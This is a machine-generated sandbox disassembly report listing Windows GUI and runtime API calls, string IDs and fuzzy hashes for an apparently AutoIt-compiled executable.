APIs
• SetTextColor.GDI32(?,00000000), ref: 00F2D2DB
• GetSysColorBrush.USER32(0000000F), ref: 00F2D30C
• GetSysColor.USER32(0000000F), ref: 00F2D318
• SetBkColor.GDI32(?,000000FF), ref: 00F2D332
• SelectObject.GDI32(?,00000000), ref: 00F2D341
• InflateRect.USER32(?,000000FF,000000FF), ref: 00F2D36C
• GetSysColor.USER32(00000010), ref: 00F2D374
                                                                                                                                                                                                                                                      • CreateSolidBrush.GDI32(00000000), ref: 00F2D37B
                                                                                                                                                                                                                                                      • FrameRect.USER32(?,?,00000000), ref: 00F2D38A
                                                                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00F2D391
                                                                                                                                                                                                                                                      • InflateRect.USER32(?,000000FE,000000FE), ref: 00F2D3DC
                                                                                                                                                                                                                                                      • FillRect.USER32(?,?,00000000), ref: 00F2D40E
                                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00F2D439
                                                                                                                                                                                                                                                        • Part of subcall function 00F2D575: GetSysColor.USER32(00000012), ref: 00F2D5AE
                                                                                                                                                                                                                                                        • Part of subcall function 00F2D575: SetTextColor.GDI32(?,?), ref: 00F2D5B2
                                                                                                                                                                                                                                                        • Part of subcall function 00F2D575: GetSysColorBrush.USER32(0000000F), ref: 00F2D5C8
                                                                                                                                                                                                                                                        • Part of subcall function 00F2D575: GetSysColor.USER32(0000000F), ref: 00F2D5D3
                                                                                                                                                                                                                                                        • Part of subcall function 00F2D575: GetSysColor.USER32(00000011), ref: 00F2D5F0
                                                                                                                                                                                                                                                        • Part of subcall function 00F2D575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00F2D5FE
                                                                                                                                                                                                                                                        • Part of subcall function 00F2D575: SelectObject.GDI32(?,00000000), ref: 00F2D60F
                                                                                                                                                                                                                                                        • Part of subcall function 00F2D575: SetBkColor.GDI32(?,00000000), ref: 00F2D618
                                                                                                                                                                                                                                                        • Part of subcall function 00F2D575: SelectObject.GDI32(?,?), ref: 00F2D625
                                                                                                                                                                                                                                                        • Part of subcall function 00F2D575: InflateRect.USER32(?,000000FF,000000FF), ref: 00F2D644
                                                                                                                                                                                                                                                        • Part of subcall function 00F2D575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00F2D65B
                                                                                                                                                                                                                                                        • Part of subcall function 00F2D575: GetWindowLongW.USER32(00000000,000000F0), ref: 00F2D670
                                                                                                                                                                                                                                                        • Part of subcall function 00F2D575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00F2D698
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3521893082-0
                                                                                                                                                                                                                                                      • Opcode ID: 702274782f0b9954ed17006f2c50703a0d52fdd7a9d292e05b461651c628e64d
                                                                                                                                                                                                                                                      • Instruction ID: 0b6ec36fe252823905b0f2ad511af35ca22b664c4c785f72d3d2a5984509a7e5
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 702274782f0b9954ed17006f2c50703a0d52fdd7a9d292e05b461651c628e64d
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8B91C076408315BFDB10DF64DC08E6B7BA9FF9A325F100A19F962961E0CB31D944EB52
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • DestroyWindow.USER32 ref: 00EDB98B
                                                                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00EDB9CD
                                                                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00EDB9D8
                                                                                                                                                                                                                                                      • DestroyIcon.USER32(00000000), ref: 00EDB9E3
                                                                                                                                                                                                                                                      • DestroyWindow.USER32(00000000), ref: 00EDB9EE
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001308,?,00000000), ref: 00F3D2AA
                                                                                                                                                                                                                                                      • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00F3D2E3
                                                                                                                                                                                                                                                      • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 00F3D711
                                                                                                                                                                                                                                                        • Part of subcall function 00EDB9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00EDB759,?,00000000,?,?,?,?,00EDB72B,00000000,?), ref: 00EDBA58
                                                                                                                                                                                                                                                      • SendMessageW.USER32 ref: 00F3D758
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00F3D76F
                                                                                                                                                                                                                                                      • ImageList_Destroy.COMCTL32(00000000), ref: 00F3D785
                                                                                                                                                                                                                                                      • ImageList_Destroy.COMCTL32(00000000), ref: 00F3D790
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                                                                      • API String ID: 464785882-4108050209
                                                                                                                                                                                                                                                      • Opcode ID: 193c77076fcf99975d98cf04ab855321b43dc4cb0af0db96ee83b733ef6bf416
                                                                                                                                                                                                                                                      • Instruction ID: 8624dae7958feafe7553c169d6ecb0361051f6471500f319636a71b2c649f427
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 193c77076fcf99975d98cf04ab855321b43dc4cb0af0db96ee83b733ef6bf416
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6012CE34604241DFDB20CF24D894BA9BBF4FF49324F18556AE989DB252D731EC42EB91
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 00F0DBD6
                                                                                                                                                                                                                                                      • GetDriveTypeW.KERNEL32(?,00F5DC54,?,\\.\,00F5DC00), ref: 00F0DCC3
                                                                                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000000,00F5DC54,?,\\.\,00F5DC00), ref: 00F0DE29
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ErrorMode$DriveType
                                                                                                                                                                                                                                                      • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                                                                                                                                                      • API String ID: 2907320926-4222207086
                                                                                                                                                                                                                                                      • Opcode ID: 37541d7e2f58e7449c5d4f7b6d7e9ccb1165c42fec45ca25374f20c2b641fe85
                                                                                                                                                                                                                                                      • Instruction ID: 636ec88b54b780605478a1f25737eb748e1ec62c1c2a7672fdd617e79366bea5
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 37541d7e2f58e7449c5d4f7b6d7e9ccb1165c42fec45ca25374f20c2b641fe85
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0651AF31749302EBC210DF98CD82E29B7E0FB94715B24991EF44BAB2D1DB61D946FA43
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __wcsnicmp
                                                                                                                                                                                                                                                      • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                                                                                                                                                                      • API String ID: 1038674560-86951937
                                                                                                                                                                                                                                                      • Opcode ID: 819684a33bcefea0d7666fc90a3ec52e3292e6e67d248b4032eb6d3d15c634e6
                                                                                                                                                                                                                                                      • Instruction ID: 0635bf3b6bff9c15de0932ccf80ecb8a0ddc7aa2c17efa7a97884de44a1c72ce
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 819684a33bcefea0d7666fc90a3ec52e3292e6e67d248b4032eb6d3d15c634e6
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C0811B306402197ACB25AB64DD43FBE7BA8EF14310F146029FD0AB61C2EB61D956D296
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • CharUpperBuffW.USER32(?,?,00F5DC00), ref: 00F26449
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: BuffCharUpper
                                                                                                                                                                                                                                                      • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                                                                                                                                                                                      • API String ID: 3964851224-45149045
                                                                                                                                                                                                                                                      • Opcode ID: d37da22418e1e831c8871ad8e6f95891356e000ebc0b4ff7bfd04d0339006a28
                                                                                                                                                                                                                                                      • Instruction ID: cbf27b8a8be86c8c0214f57f9bbdfde411ba5e4e64c568a0541905fbade317ed
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d37da22418e1e831c8871ad8e6f95891356e000ebc0b4ff7bfd04d0339006a28
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BDC191306042558BCB04EF10D651A6EB7E5EF94354F14585EF886AB3E3DB21ED0BEB82
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetSysColor.USER32(00000012), ref: 00F2D5AE
                                                                                                                                                                                                                                                      • SetTextColor.GDI32(?,?), ref: 00F2D5B2
                                                                                                                                                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00F2D5C8
                                                                                                                                                                                                                                                      • GetSysColor.USER32(0000000F), ref: 00F2D5D3
                                                                                                                                                                                                                                                      • CreateSolidBrush.GDI32(?), ref: 00F2D5D8
                                                                                                                                                                                                                                                      • GetSysColor.USER32(00000011), ref: 00F2D5F0
                                                                                                                                                                                                                                                      • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00F2D5FE
                                                                                                                                                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 00F2D60F
                                                                                                                                                                                                                                                      • SetBkColor.GDI32(?,00000000), ref: 00F2D618
                                                                                                                                                                                                                                                      • SelectObject.GDI32(?,?), ref: 00F2D625
                                                                                                                                                                                                                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 00F2D644
                                                                                                                                                                                                                                                      • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00F2D65B
                                                                                                                                                                                                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00F2D670
                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00F2D698
                                                                                                                                                                                                                                                      • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00F2D6BF
                                                                                                                                                                                                                                                      • InflateRect.USER32(?,000000FD,000000FD), ref: 00F2D6DD
                                                                                                                                                                                                                                                      • DrawFocusRect.USER32(?,?), ref: 00F2D6E8
                                                                                                                                                                                                                                                      • GetSysColor.USER32(00000011), ref: 00F2D6F6
                                                                                                                                                                                                                                                      • SetTextColor.GDI32(?,00000000), ref: 00F2D6FE
                                                                                                                                                                                                                                                      • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00F2D712
                                                                                                                                                                                                                                                      • SelectObject.GDI32(?,00F2D2A5), ref: 00F2D729
                                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 00F2D734
                                                                                                                                                                                                                                                      • SelectObject.GDI32(?,?), ref: 00F2D73A
                                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 00F2D73F
                                                                                                                                                                                                                                                      • SetTextColor.GDI32(?,?), ref: 00F2D745
                                                                                                                                                                                                                                                      • SetBkColor.GDI32(?,?), ref: 00F2D74F
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1996641542-0
                                                                                                                                                                                                                                                      • Opcode ID: 24b355f7418f19af0268548f248ff3ae3384822a23653b951327b50b333e9a75
                                                                                                                                                                                                                                                      • Instruction ID: 5a33a4cbbff8e5fa15941f24ab3a4dda74589ceff508a393a9478b60b6136d0b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 24b355f7418f19af0268548f248ff3ae3384822a23653b951327b50b333e9a75
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 58516B76900218BFEF119FA8DC48EAE7BB9FF49320F244115F915AB2A1D7719A40EF50
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00F2B7B0
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F2B7C1
                                                                                                                                                                                                                                                      • CharNextW.USER32(0000014E), ref: 00F2B7F0
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00F2B831
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00F2B847
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F2B858
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00F2B875
                                                                                                                                                                                                                                                      • SetWindowTextW.USER32(?,0000014E), ref: 00F2B8C7
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00F2B8DD
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00F2B90E
                                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00F2B933
                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00F2B97C
                                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00F2B9DB
                                                                                                                                                                                                                                                      • SendMessageW.USER32 ref: 00F2BA05
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001074,?,00000001), ref: 00F2BA5D
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000133D,?,?), ref: 00F2BB0A
                                                                                                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00F2BB2C
                                                                                                                                                                                                                                                      • GetMenuItemInfoW.USER32(?), ref: 00F2BB76
                                                                                                                                                                                                                                                      • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00F2BBA3
                                                                                                                                                                                                                                                      • DrawMenuBar.USER32(?), ref: 00F2BBB2
                                                                                                                                                                                                                                                      • SetWindowTextW.USER32(?,0000014E), ref: 00F2BBDA
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                                                                      • API String ID: 1073566785-4108050209
                                                                                                                                                                                                                                                      • Opcode ID: 639149354fa367b2732e88c3e64ed095a03cc229999cdf88c555d620e35923af
                                                                                                                                                                                                                                                      • Instruction ID: 7fbd6f7d6b28be92b8c9024b78fd895daddafe51da2e021a1696e058bcfdedbf
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 639149354fa367b2732e88c3e64ed095a03cc229999cdf88c555d620e35923af
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F6E17E7590022CABDB109FA5DC84EEE7BB8FF45720F148156FD19AA190D7748A81EF60
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetCursorPos.USER32(?), ref: 00F2778A
                                                                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 00F2779F
                                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000), ref: 00F277A6
                                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00F27808
                                                                                                                                                                                                                                                      • DestroyWindow.USER32(?), ref: 00F27834
                                                                                                                                                                                                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00F2785D
                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F2787B
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00F278A1
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000421,?,?), ref: 00F278B6
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00F278C9
                                                                                                                                                                                                                                                      • IsWindowVisible.USER32(?), ref: 00F278E9
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00F27904
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00F27918
                                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00F27930
                                                                                                                                                                                                                                                      • MonitorFromPoint.USER32(?,?,00000002), ref: 00F27956
                                                                                                                                                                                                                                                      • GetMonitorInfoW.USER32 ref: 00F27970
                                                                                                                                                                                                                                                      • CopyRect.USER32(?,?), ref: 00F27987
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000412,00000000), ref: 00F279F2
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                                                                                                                                                      • String ID: ($0$tooltips_class32
                                                                                                                                                                                                                                                      • API String ID: 698492251-4156429822
                                                                                                                                                                                                                                                      • Opcode ID: afd48d6fa053192bd0ed13559da4b41e38341d91ca9da52132ce396444aa0c54
                                                                                                                                                                                                                                                      • Instruction ID: 6cb310631a803d5073860474538ad0ad498f6b5f363c98008e91daff3d08fdeb
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: afd48d6fa053192bd0ed13559da4b41e38341d91ca9da52132ce396444aa0c54
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A5B1B071608310AFDB04EF64D948B6ABBE4FF89310F00891DF9999B291D771EC45DB92
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00EDA939
                                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000007), ref: 00EDA941
                                                                                                                                                                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00EDA96C
                                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000008), ref: 00EDA974
                                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000004), ref: 00EDA999
                                                                                                                                                                                                                                                      • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00EDA9B6
                                                                                                                                                                                                                                                      • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 00EDA9C6
                                                                                                                                                                                                                                                      • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00EDA9F9
                                                                                                                                                                                                                                                      • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00EDAA0D
                                                                                                                                                                                                                                                      • GetClientRect.USER32(00000000,000000FF), ref: 00EDAA2B
                                                                                                                                                                                                                                                      • GetStockObject.GDI32(00000011), ref: 00EDAA47
                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 00EDAA52
                                                                                                                                                                                                                                                        • Part of subcall function 00EDB63C: GetCursorPos.USER32(000000FF), ref: 00EDB64F
                                                                                                                                                                                                                                                        • Part of subcall function 00EDB63C: ScreenToClient.USER32(00000000,000000FF), ref: 00EDB66C
                                                                                                                                                                                                                                                        • Part of subcall function 00EDB63C: GetAsyncKeyState.USER32(00000001), ref: 00EDB691
